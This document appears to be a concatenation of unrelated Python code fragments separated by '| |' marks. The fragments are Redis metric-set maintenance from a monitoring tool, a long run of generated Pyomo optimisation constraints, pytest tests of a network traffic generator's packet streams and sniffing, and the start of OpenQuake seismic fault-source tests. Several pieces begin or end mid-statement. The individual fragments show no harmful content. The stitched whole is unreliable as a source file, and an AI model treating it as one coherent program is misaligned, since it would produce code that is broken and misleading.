logger.error('error :: metrics_manager :: failed to rename Redis set mirage.unique_metrics to mirage.unique_metrics.old')
try:
self.redis_conn.rename('new_mirage.unique_metrics', 'mirage.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to rename Redis set new_mirage.unique_metrics to mirage.unique_metrics')
try:
self.redis_conn.delete('mirage.unique_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the mirage.unique_metrics Redis set')
end_refresh = timer()
logger.info('metrics_manager :: refresh of smtp_alerter_metrics, non_smtp_alerter_metrics and mirage_metrics took %.6f seconds' % (end_refresh - start_refresh))
if mirage_metrics_expiration_times:
logger.info('metrics_manager :: managing mirage.hash_key.metrics_expiration_times Redis hash key')
updated_keys = 0
added_keys = 0
removed_keys = 0
mirage_metrics_expiration_times_errors = 0
last_metrics_expiration_times = []
try:
raw_last_metrics_expiration_times = self.redis_conn_decoded.hgetall('mirage.hash_key.metrics_expiration_times')
for base_name_bytes in raw_last_metrics_expiration_times:
base_name = str(base_name_bytes)
expiration_time = int(raw_last_metrics_expiration_times[base_name])
last_metrics_expiration_times.append([base_name, expiration_time])
logger.info('metrics_manager :: %s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(last_metrics_expiration_times)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get Redis hash key mirage.hash_key.metrics_expiration_times')
last_metrics_expiration_times = []
# Add them all if there are none in the hash key
if not last_metrics_expiration_times:
logger.info('metrics_manager :: nothing found in Redis hash key, added all %s metrics from mirage_metrics_expiration_times' % (
str(len(mirage_metrics_expiration_times))))
error_logged = False
for item in mirage_metrics_expiration_times:
try:
self.redis_conn.hset(
'mirage.hash_key.metrics_expiration_times',
item[0], int(item[1]))
added_keys += 1
except:
mirage_metrics_expiration_times_errors += 1
if not error_logged:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add entry in mirage.hash_key.metrics_expiration_times for - %s' % str(item))
error_logged = True
logger.info('metrics_manager :: added all %s metrics to mirage.hash_key.metrics_expiration_times Redis hash' % (
str(len(mirage_metrics_expiration_times))))
# Determine the base_names in the last_metrics_expiration_times
last_metrics_expiration_times_metrics = []
if last_metrics_expiration_times:
try:
last_metrics_expiration_times_metrics = [item[0] for item in last_metrics_expiration_times]
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to generate list of metric names from last_metrics_expiration_times')
| |
+ m.b103 - m.b202 <= 0)
m.c3363 = Constraint(expr= - m.b96 + m.b104 - m.b203 <= 0)
m.c3364 = Constraint(expr= - m.b96 + m.b105 - m.b204 <= 0)
m.c3365 = Constraint(expr= - m.b96 + m.b106 - m.b205 <= 0)
m.c3366 = Constraint(expr= - m.b96 + m.b107 - m.b206 <= 0)
m.c3367 = Constraint(expr= - m.b96 + m.b108 - m.b207 <= 0)
m.c3368 = Constraint(expr= - m.b96 + m.b109 - m.b208 <= 0)
m.c3369 = Constraint(expr= - m.b96 + m.b110 - m.b209 <= 0)
m.c3370 = Constraint(expr= - m.b97 + m.b98 - m.b210 <= 0)
m.c3371 = Constraint(expr= - m.b97 + m.b99 - m.b211 <= 0)
m.c3372 = Constraint(expr= - m.b97 + m.b100 - m.b212 <= 0)
m.c3373 = Constraint(expr= - m.b97 + m.b101 - m.b213 <= 0)
m.c3374 = Constraint(expr= - m.b97 + m.b102 - m.b214 <= 0)
m.c3375 = Constraint(expr= - m.b97 + m.b103 - m.b215 <= 0)
m.c3376 = Constraint(expr= - m.b97 + m.b104 - m.b216 <= 0)
m.c3377 = Constraint(expr= - m.b97 + m.b105 - m.b217 <= 0)
m.c3378 = Constraint(expr= - m.b97 + m.b106 - m.b218 <= 0)
m.c3379 = Constraint(expr= - m.b97 + m.b107 - m.b219 <= 0)
m.c3380 = Constraint(expr= - m.b97 + m.b108 - m.b220 <= 0)
m.c3381 = Constraint(expr= - m.b97 + m.b109 - m.b221 <= 0)
m.c3382 = Constraint(expr= - m.b97 + m.b110 - m.b222 <= 0)
m.c3383 = Constraint(expr= - m.b98 + m.b99 - m.b223 <= 0)
m.c3384 = Constraint(expr= - m.b98 + m.b100 - m.b224 <= 0)
m.c3385 = Constraint(expr= - m.b98 + m.b101 - m.b225 <= 0)
m.c3386 = Constraint(expr= - m.b98 + m.b102 - m.b226 <= 0)
m.c3387 = Constraint(expr= - m.b98 + m.b103 - m.b227 <= 0)
m.c3388 = Constraint(expr= - m.b98 + m.b104 - m.b228 <= 0)
m.c3389 = Constraint(expr= - m.b98 + m.b105 - m.b229 <= 0)
m.c3390 = Constraint(expr= - m.b98 + m.b106 - m.b230 <= 0)
m.c3391 = Constraint(expr= - m.b98 + m.b107 - m.b231 <= 0)
m.c3392 = Constraint(expr= - m.b98 + m.b108 - m.b232 <= 0)
m.c3393 = Constraint(expr= - m.b98 + m.b109 - m.b233 <= 0)
m.c3394 = Constraint(expr= - m.b98 + m.b110 - m.b234 <= 0)
m.c3395 = Constraint(expr= - m.b99 + m.b100 - m.b235 <= 0)
m.c3396 = Constraint(expr= - m.b99 + m.b101 - m.b236 <= 0)
m.c3397 = Constraint(expr= - m.b99 + m.b102 - m.b237 <= 0)
m.c3398 = Constraint(expr= - m.b99 + m.b103 - m.b238 <= 0)
m.c3399 = Constraint(expr= - m.b99 + m.b104 - m.b239 <= 0)
m.c3400 = Constraint(expr= - m.b99 + m.b105 - m.b240 <= 0)
m.c3401 = Constraint(expr= - m.b99 + m.b106 - m.b241 <= 0)
m.c3402 = Constraint(expr= - m.b99 + m.b107 - m.b242 <= 0)
m.c3403 = Constraint(expr= - m.b99 + m.b108 - m.b243 <= 0)
m.c3404 = Constraint(expr= - m.b99 + m.b109 - m.b244 <= 0)
m.c3405 = Constraint(expr= - m.b99 + m.b110 - m.b245 <= 0)
m.c3406 = Constraint(expr= - m.b100 + m.b101 - m.b246 <= 0)
m.c3407 = Constraint(expr= - m.b100 + m.b102 - m.b247 <= 0)
m.c3408 = Constraint(expr= - m.b100 + m.b103 - m.b248 <= 0)
m.c3409 = Constraint(expr= - m.b100 + m.b104 - m.b249 <= 0)
m.c3410 = Constraint(expr= - m.b100 + m.b105 - m.b250 <= 0)
m.c3411 = Constraint(expr= - m.b100 + m.b106 - m.b251 <= 0)
m.c3412 = Constraint(expr= - m.b100 + m.b107 - m.b252 <= 0)
m.c3413 = Constraint(expr= - m.b100 + m.b108 - m.b253 <= 0)
m.c3414 = Constraint(expr= - m.b100 + m.b109 - m.b254 <= 0)
m.c3415 = Constraint(expr= - m.b100 + m.b110 - m.b255 <= 0)
m.c3416 = Constraint(expr= - m.b101 + m.b102 - m.b256 <= 0)
m.c3417 = Constraint(expr= - m.b101 + m.b103 - m.b257 <= 0)
m.c3418 = Constraint(expr= - m.b101 + m.b104 - m.b258 <= 0)
m.c3419 = Constraint(expr= - m.b101 + m.b105 - m.b259 <= 0)
m.c3420 = Constraint(expr= - m.b101 + m.b106 - m.b260 <= 0)
m.c3421 = Constraint(expr= - m.b101 + m.b107 - m.b261 <= 0)
m.c3422 = Constraint(expr= - m.b101 + m.b108 - m.b262 <= 0)
m.c3423 = Constraint(expr= - m.b101 + m.b109 - m.b263 <= 0)
m.c3424 = Constraint(expr= - m.b101 + m.b110 - m.b264 <= 0)
m.c3425 = Constraint(expr= - m.b102 + m.b103 - m.b265 <= 0)
m.c3426 = Constraint(expr= - m.b102 + m.b104 - m.b266 <= 0)
m.c3427 = Constraint(expr= - m.b102 + m.b105 - m.b267 <= 0)
m.c3428 = Constraint(expr= - m.b102 + m.b106 - m.b268 <= 0)
m.c3429 = Constraint(expr= - m.b102 + m.b107 - m.b269 <= 0)
m.c3430 = Constraint(expr= - m.b102 + m.b108 - m.b270 <= 0)
m.c3431 = Constraint(expr= - m.b102 + m.b109 - m.b271 <= 0)
m.c3432 = Constraint(expr= - m.b102 + m.b110 - m.b272 <= 0)
m.c3433 = Constraint(expr= - m.b103 + m.b104 - m.b273 <= 0)
m.c3434 = Constraint(expr= - m.b103 + m.b105 - m.b274 <= 0)
m.c3435 = Constraint(expr= - m.b103 + m.b106 - m.b275 <= 0)
m.c3436 = Constraint(expr= - m.b103 + m.b107 - m.b276 <= 0)
m.c3437 = Constraint(expr= - m.b103 + m.b108 - m.b277 <= 0)
m.c3438 = Constraint(expr= - m.b103 + m.b109 - m.b278 <= 0)
m.c3439 = Constraint(expr= - m.b103 + m.b110 - m.b279 <= 0)
m.c3440 = Constraint(expr= - m.b104 + m.b105 - m.b280 <= 0)
m.c3441 = Constraint(expr= - m.b104 + m.b106 - m.b281 <= 0)
m.c3442 = Constraint(expr= - m.b104 + m.b107 - m.b282 <= 0)
m.c3443 = Constraint(expr= - m.b104 + m.b108 - m.b283 <= 0)
m.c3444 = Constraint(expr= - m.b104 + m.b109 - m.b284 <= 0)
m.c3445 = Constraint(expr= - m.b104 + m.b110 - m.b285 <= 0)
m.c3446 = Constraint(expr= - m.b105 + m.b106 - m.b286 <= 0)
m.c3447 = Constraint(expr= - m.b105 + m.b107 - m.b287 <= 0)
m.c3448 = Constraint(expr= - m.b105 + m.b108 - m.b288 <= 0)
m.c3449 = Constraint(expr= - m.b105 + m.b109 - m.b289 <= 0)
m.c3450 = Constraint(expr= - m.b105 + m.b110 - m.b290 <= 0)
m.c3451 = Constraint(expr= - m.b106 + m.b107 - m.b291 <= 0)
m.c3452 = Constraint(expr= - m.b106 + m.b108 - m.b292 <= 0)
m.c3453 = Constraint(expr= - m.b106 + m.b109 - m.b293 <= 0)
m.c3454 = Constraint(expr= - m.b106 + m.b110 - m.b294 <= 0)
m.c3455 = Constraint(expr= - m.b107 + m.b108 - m.b295 <= 0)
m.c3456 = Constraint(expr= - m.b107 + m.b109 - m.b296 <= 0)
m.c3457 = Constraint(expr= - m.b107 + m.b110 - m.b297 <= 0)
m.c3458 = Constraint(expr= - m.b108 + m.b109 - m.b298 <= 0)
m.c3459 = Constraint(expr= - m.b108 + m.b110 - m.b299 <= 0)
m.c3460 = Constraint(expr= - m.b109 + m.b110 - m.b300 <= 0)
m.c3461 = Constraint(expr= - m.b111 + m.b112 - m.b130 <= 0)
m.c3462 = Constraint(expr= - m.b111 + m.b113 - m.b131 <= 0)
m.c3463 = Constraint(expr= - m.b111 + m.b114 - m.b132 <= 0)
m.c3464 = Constraint(expr= - m.b111 + m.b115 - m.b133 <= 0)
m.c3465 = Constraint(expr= - m.b111 + m.b116 - m.b134 <= 0)
m.c3466 = Constraint(expr= - m.b111 + m.b117 - m.b135 <= 0)
m.c3467 = Constraint(expr= - m.b111 + m.b118 - m.b136 <= 0)
m.c3468 = Constraint(expr= - m.b111 + m.b119 - m.b137 <= 0)
m.c3469 = Constraint(expr= - m.b111 + m.b120 - m.b138 <= 0)
m.c3470 = Constraint(expr= - m.b111 + m.b121 - m.b139 <= 0)
m.c3471 = Constraint(expr= - m.b111 + m.b122 - m.b140 <= 0)
m.c3472 = Constraint(expr= - m.b111 + m.b123 - m.b141 <= 0)
m.c3473 = Constraint(expr= - m.b111 + m.b124 - m.b142 <= 0)
m.c3474 = Constraint(expr= - m.b111 + m.b125 - m.b143 <= 0)
m.c3475 = Constraint(expr= - m.b111 + m.b126 - m.b144 <= 0)
m.c3476 = Constraint(expr= - m.b111 + m.b127 - m.b145 <= 0)
m.c3477 = Constraint(expr= - m.b111 + m.b128 - m.b146 <= 0)
m.c3478 = Constraint(expr= - m.b111 + m.b129 - m.b147 <= 0)
m.c3479 = Constraint(expr= - m.b112 + m.b113 - m.b148 <= 0)
m.c3480 = Constraint(expr= - m.b112 + m.b114 - m.b149 <= 0)
m.c3481 = Constraint(expr= - m.b112 + m.b115 - m.b150 <= 0)
m.c3482 = Constraint(expr= - m.b112 + m.b116 - m.b151 <= 0)
m.c3483 = Constraint(expr= - m.b112 + m.b117 - m.b152 <= 0)
m.c3484 = Constraint(expr= - m.b112 + m.b118 - m.b153 <= 0)
m.c3485 = Constraint(expr= - m.b112 + m.b119 - m.b154 <= 0)
m.c3486 = Constraint(expr= - m.b112 + m.b120 - m.b155 <= 0)
m.c3487 = Constraint(expr= - m.b112 + m.b121 - m.b156 <= 0)
m.c3488 = Constraint(expr= - m.b112 + m.b122 - m.b157 <= 0)
m.c3489 = Constraint(expr= - m.b112 + m.b123 - m.b158 <= 0)
m.c3490 = Constraint(expr= - m.b112 | |
{"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x00}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x0f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x1f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x20}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x30}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x3f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x40}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x5a}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x5f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x60}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x71}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x7f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x80}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x8f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x9f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xa0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xb3}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xbf}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xc0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xc5}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xdf}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xe0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xe1}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xff}}, {"TCP": {}}))
packet_count = len(pack_list)
stream_ids = []
for pack in pack_list:
stream_ids.append(tg.set_stream(pack, count=1, iface=iface))
tg.set_qos_stat_type(iface, "IP")
tg.clear_statistics([iface])
tg.start_sniff([iface], sniffing_time=5)
tg.start_streams(stream_ids)
data = tg.stop_sniff([iface])
tg.stop_streams(stream_ids)
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
assert tg.get_received_frames_count(iface) == packet_count
for prio in range(8):
assert tg.get_qos_frames_count(iface, prio) == 3
def test_get_rate_stat(self, tg):
"""Check transmit rate reading.
"""
if tg.type != "ixiahl":
pytest.skip("Get port txrate increment isn't supported by Pypacker TG.")
iface = tg.ports[0]
stream_id_1 = tg.set_stream(ETH_IP_TCP, continuous=True, inter=0.1, iface=iface)
stream_id_2 = tg.set_stream(ETH_IP_TCP, continuous=True, inter=0.05, iface=iface)
tg.start_streams([stream_id_1])
time.sleep(1)
assert 10 * 0.9 <= tg.get_port_txrate(iface) <= 10 * 1.1
assert 10 * 0.9 <= tg.get_port_rxrate(iface) <= 10 * 1.1
tg.stop_streams([stream_id_1])
tg.start_streams([stream_id_2])
time.sleep(1)
assert 20 * 0.95 <= tg.get_port_txrate(iface) <= 20 * 1.05
assert 20 * 0.95 <= tg.get_port_rxrate(iface) <= 20 * 1.05
tg.stop_streams([stream_id_2])
tg.start_streams([stream_id_1, stream_id_2])
time.sleep(1)
assert 30 * 0.96 <= tg.get_port_txrate(iface) <= 30 * 1.04
assert 30 * 0.96 <= tg.get_port_rxrate(iface) <= 30 * 1.04
tg.stop_streams([stream_id_1, stream_id_2])
def test_check_increment_ip_src(self, tg):
"""Check all fields in incremented packet. IP.src increment.
"""
iface = tg.ports[0]
packet_count = 5
src_mac = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_IP_UDP, count=packet_count, sip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_IP_UDP, received)
def test_check_increment_ip_dst(self, tg):
"""Check all fields in incremented packet. IP.dst increment.
"""
iface = tg.ports[0]
packet_count = 1
src_mac = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_IP_UDP, count=packet_count, dip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_IP_UDP, received)
def test_check_increment_ip_dscp(self, tg):
"""Check all fields in incremented packet. IP.tos increment.
"""
iface = tg.ports[0]
packet_count = 1
src_mac = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_IP_UDP, count=packet_count, dscp_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_IP_UDP, received)
def test_check_increment_ip_proto(self, tg):
"""Check all fields in incremented packet. IP.proto increment.
"""
iface = tg.ports[0]
packet_count = 1
src_mac = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_IP_UDP, count=packet_count, protocol_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_IP_UDP, received)
def test_check_increment_arp_hwsrc(self, tg):
"""Check all fields in incremented packet. APR.hwsrc increment.
"""
iface = tg.ports[0]
packet_count = 3
src_mac = DOT1Q_ARP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_ARP, count=3, arp_sa_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=3, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == 1, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_ARP, received)
def test_check_increment_arp_psrc(self, tg):
"""Check all fields in incremented packet. APR.psrc increment.
"""
iface = tg.ports[0]
packet_count = 1
src_mac = DOT1Q_ARP[0]["Ethernet"]["src"]
stream_id = tg.set_stream(DOT1Q_ARP, count=1, arp_sip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=3, src_filter=src_mac)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(DOT1Q_ARP, received)
def test_check_increment_igmp_ip(self, tg):
"""Check all fields in incremented packet. IGMP.ip increment.
"""
iface = tg.ports[0]
packet_count = 1
stream_id = tg.set_stream(ETH_IP_IGMP, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(ETH_IP_IGMP, received)
packet = copy.deepcopy(ETH_IP_IGMP)
packet[3]["IGMP"]["type"] = 18
stream_id = tg.set_stream(packet, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(packet, received)
packet = copy.deepcopy(ETH_IP_IGMP)
packet[3]["IGMP"]["type"] = 23
stream_id = tg.set_stream(packet, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(packet, received)
packet = copy.deepcopy(ETH_IP_IGMP)
packet[3]["IGMP"]["type"] = 34
packet[3]["IGMP"]["maxresp"] = 0
stream_id = tg.set_stream(packet, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(packet, received)
packet_count = 4
packet = copy.deepcopy(ETH_IP_IGMP)
packet[3]["IGMP"]["type"] = 22
stream_id = tg.set_stream(packet, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(packet, received)
def test_check_increment_ip_icmp(self, tg):
"""Check all fields in incremented packet. IP.src increment.
"""
iface = tg.ports[0]
packet_count = 1
stream_id = tg.set_stream(ETH_IP_ICMP, count=packet_count, sip_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=3, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(ETH_IP_ICMP, received)
def test_check_increment_udp_sport(self, tg):
"""Check all fields in incremented packet. UDP.sport increment.
"""
iface = tg.ports[0]
packet_count = 1
stream_id = tg.set_stream(ETH_IP_UDP, count=packet_count, sudp_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet is equal to sent packet
self.verify_packets_data(ETH_IP_UDP, received)
def test_check_increment_udp_dport(self, tg):
"""Check all fields in incremented packet. UDP.dport increment.
"""
iface = tg.ports[0]
packet_count = 1
stream_id = tg.set_stream(ETH_IP_UDP, count=packet_count, dudp_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet | |
# The Hazard Library
# Copyright (C) 2012-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from copy import deepcopy
from openquake.hazardlib.const import TRT
from openquake.hazardlib.source.simple_fault import SimpleFaultSource
from openquake.hazardlib.source.rupture import ParametricProbabilisticRupture
from openquake.hazardlib.mfd import TruncatedGRMFD, EvenlyDiscretizedMFD
import openquake.hazardlib.mfd.evenly_discretized as mfdeven
import openquake.hazardlib.scalerel.base as msr
import openquake.hazardlib.tom as tom
from openquake.hazardlib.scalerel import PeerMSR, WC1994
from openquake.hazardlib.geo import Point, Line
from openquake.hazardlib.tom import PoissonTOM
from openquake.hazardlib.tests import assert_angles_equal, assert_pickleable
from openquake.hazardlib.tests.geo.surface._utils import assert_mesh_is
from openquake.hazardlib.tests.source import \
_simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
TRT = TRT.ACTIVE_SHALLOW_CRUST
RAKE = 0
TOM = PoissonTOM(50.)
def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
source_id = name = 'test-source'
trt = self.TRT
rake = self.RAKE
rupture_mesh_spacing = 1
upper_seismogenic_depth = 0
lower_seismogenic_depth = 4.2426406871192848
magnitude_scaling_relationship = PeerMSR()
rupture_aspect_ratio = aspect_ratio
tom = self.TOM
if fault_trace is None:
fault_trace = Line([Point(0.0, 0.0),
Point(0.0, 0.0359728811758),
Point(0.0190775080917, 0.0550503815181),
Point(0.03974514139, 0.0723925718855)])
sfs = SimpleFaultSource(
source_id, name, trt, mfd, rupture_mesh_spacing,
magnitude_scaling_relationship, rupture_aspect_ratio, tom,
upper_seismogenic_depth, lower_seismogenic_depth,
fault_trace, dip, rake
)
assert_pickleable(sfs)
return sfs
def _test_ruptures(self, expected_ruptures, source):
ruptures = list(source.iter_ruptures())
for rupture in ruptures:
self.assertIsInstance(rupture, ParametricProbabilisticRupture)
self.assertIs(rupture.temporal_occurrence_model, self.TOM)
self.assertIs(rupture.tectonic_region_type, self.TRT)
self.assertEqual(rupture.rake, self.RAKE)
self.assertEqual(len(expected_ruptures), source.count_ruptures())
for i in range(len(expected_ruptures)):
expected_rupture, rupture = expected_ruptures[i], ruptures[i]
self.assertAlmostEqual(rupture.mag, expected_rupture['mag'])
self.assertAlmostEqual(rupture.rake, expected_rupture['rake'])
self.assertAlmostEqual(rupture.occurrence_rate,
expected_rupture['occurrence_rate'])
assert_mesh_is(self, rupture.surface,
expected_rupture['surface'])
self.assertEqual(rupture.hypocenter,
Point(*expected_rupture['hypocenter']))
assert_angles_equal(self, rupture.surface.get_strike(),
expected_rupture['strike'], delta=0.5)
assert_angles_equal(self, rupture.surface.get_dip(),
expected_rupture['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
def test_2(self):
# rupture dimensions are larger then mesh_spacing, number of nodes
# along strike and dip is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=3.0, max_mag=4.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST2_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=1.0))
def test_3(self):
# rupture length greater than fault length, number of nodes along
# length is odd and along width is even
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.0, max_mag=6.0,
bin_width=1.0)
self._test_ruptures(test_data.TEST3_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=4.0))
def test_4(self):
# rupture width greater than fault width, number of nodes along
# length is even, along width is odd
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.4, max_mag=5.5,
bin_width=0.1)
self._test_ruptures(test_data.TEST4_RUPTURES,
self._make_source(mfd=mfd, aspect_ratio=0.5))
def test_5(self):
# rupture length and width greater than fault length and width
